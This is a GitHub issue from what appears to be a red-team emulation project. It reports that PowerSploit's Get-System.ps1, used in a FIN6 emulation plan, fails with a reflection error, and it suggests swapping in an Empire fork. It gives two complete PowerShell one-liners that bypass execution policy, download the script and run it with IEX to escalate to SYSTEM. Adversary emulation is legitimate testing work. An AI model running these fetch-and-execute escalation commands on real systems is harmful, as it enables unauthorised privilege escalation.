Skip to content

[FIN6 Plan] Get-ProcAddress : Exception calling "GetMethod" Ambiguous match found. #175

Description

@Mahshid-MSH

When executing the FIN6 emulation plan (or any plan that uses the Get-System.ps1 payload), the script fails with the following error:
Get-ProcAddress : Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."

This is a known issue in PowerSploit’s Get-System.ps1 because .NET reflection on GetProcAddress is ambiguous on recent Windows versions. The BC‑SECURITY/Empire fork already contains the fix.

Image

To Reproduce

Run the following command on a modern Windows 10/11 system (fully updated) within the context of the FIN6 YAML plan:
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/Get-System.ps1'); Get-System -ServiceName 'mstdc' -PipeName 'mstdc'"

Expected behavior

The Get-System script should execute successfully, escalate privileges to SYSTEM via named pipe impersonation, and continue the Caldera operation without errors.

Environment

Windows version: Windows Server 2019

Suggested fix

Update the FIN6 YAML ability that invokes Get-System.ps1 to use the fixed version from BC‑SECURITY/Empire:
https://raw.githubusercontent.com/BC-SECURITY/Empire/v3.4.0/data/module_source/privesc/Get-System.ps1

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/v3.4.0/data/module_source/privesc/Get-System.ps1'); Get-System -ServiceName 'mstdc' -PipeName 'mstdc'"

Here is the screenshot of the new powershell command:

Image

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions